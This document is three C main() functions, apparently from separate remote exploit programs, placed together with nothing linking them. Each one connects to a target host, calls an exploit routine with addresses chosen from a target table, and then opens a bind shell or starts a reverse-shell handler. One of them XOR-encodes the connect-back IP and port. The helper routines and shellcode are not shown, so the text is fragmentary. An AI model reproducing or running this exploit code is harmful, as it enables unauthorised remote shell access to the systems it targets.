int main ( int argc, char* argv[] ) { int s, targ, i; struct sockaddr_in remote_addr; struct hostent* host_addr; if ( argc != 2 ) { printf ( "Usage: %s <ip>\n", argv[0] ); exit ( 1 ); } system ( "clear" ); header (); if ( !isip ( argv[1] ) ) { printf ( "Invalid Target IP!\n" ); exit ( 1 ); } printf("--[ select target\n"); for ( i = 0; i < 2; i++ ) printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name ); printf ( " >> " ); scanf ( "%d", &targ ); if ( targ != 0 ) if ( targ != 1 ) { printf ( "--[ invalid target!\n" ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT ); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "socket failed!\n" ); exit ( 1 ); } printf ( "--[ connecting to %s:%u...", argv[1], PORT ); if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( "done!\n" ); if ( exploit ( s, target[targ].ret ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } close ( s ); connect_to_bindshell ( argv[1], 4444 ); }
int main ( int argc, char* argv[] ) { int s, option; args myargs; system ( "clear" ); header (); parse_arguments ( argc, argv, &myargs ); s = connect_to_remote_host ( myargs.tip, myargs.tport ); printf ( "--[ select shellcode\n" ); printf ( " |\n" ); printf ( " |- [0] bind\n" ); printf ( " `- [1] cb\n" ); printf ( ">> " ); scanf ( "%d", &option ); switch ( option ) { case 0: printf ( "--[ using bind shellcode\n" ); if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, NULL ) == 1 ) { printf ( "exploitation failed!\n" ); exit ( 1 ); } connect_to_bindshell ( myargs.tip, 20000 ); break; case 1: printf ( "--[ using cb shellcode\n" ); if ( exploit ( s, target[myargs.target].smashaddr, target[myargs.target].writeaddr, myargs.lip ) == 1 ) { printf ( "exploitation failed!\n" ); exit ( 1 ); } start_reverse_handler ( 45295 ); break; default: printf ( "--[ invalid shellcode!\n" ); exit ( 1 ); } close ( s ); return 0; }
int main ( int argc, char* argv[] ) { int s; unsigned long xoredip; unsigned short xoredcbport; struct sockaddr_in remote_addr; struct hostent *host_addr; if ( argc != 2 ) if ( argc != 4 ) { fprintf ( stderr, "\nUsage\n-----\n[ Bindshell ] %s <host>\n[ Reverseshell ] %s <host> <connectback ip> <connectback port>\n\n", argv[0], argv[0] ); exit ( 1 ); } if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL ) { fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] ); exit ( 1 ); } remote_addr.sin_family = AF_INET; remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr ); remote_addr.sin_port = htons ( PORT ); system ( "clear" ); header (); if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 ) { printf ( "socket failed!\n" ); exit ( 1 ); } printf ( "--[ connecting to %s:%u...", argv[1], PORT ); if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 ) { printf ( "failed!\n" ); exit ( 1 ); } printf ( YELLOW "done!\n" NORMAL); if ( argc == 4 ) { xoredip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999; xoredcbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999; if ( exploit ( s, xoredip, xoredcbport, 0 ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } start_reverse_handler ( argv[3] ); } else { if ( exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 ) { printf ( "exploitation FAILED!\n" ); exit ( 1 ); } connect_to_bindshell ( argv[1], 4444 ); } }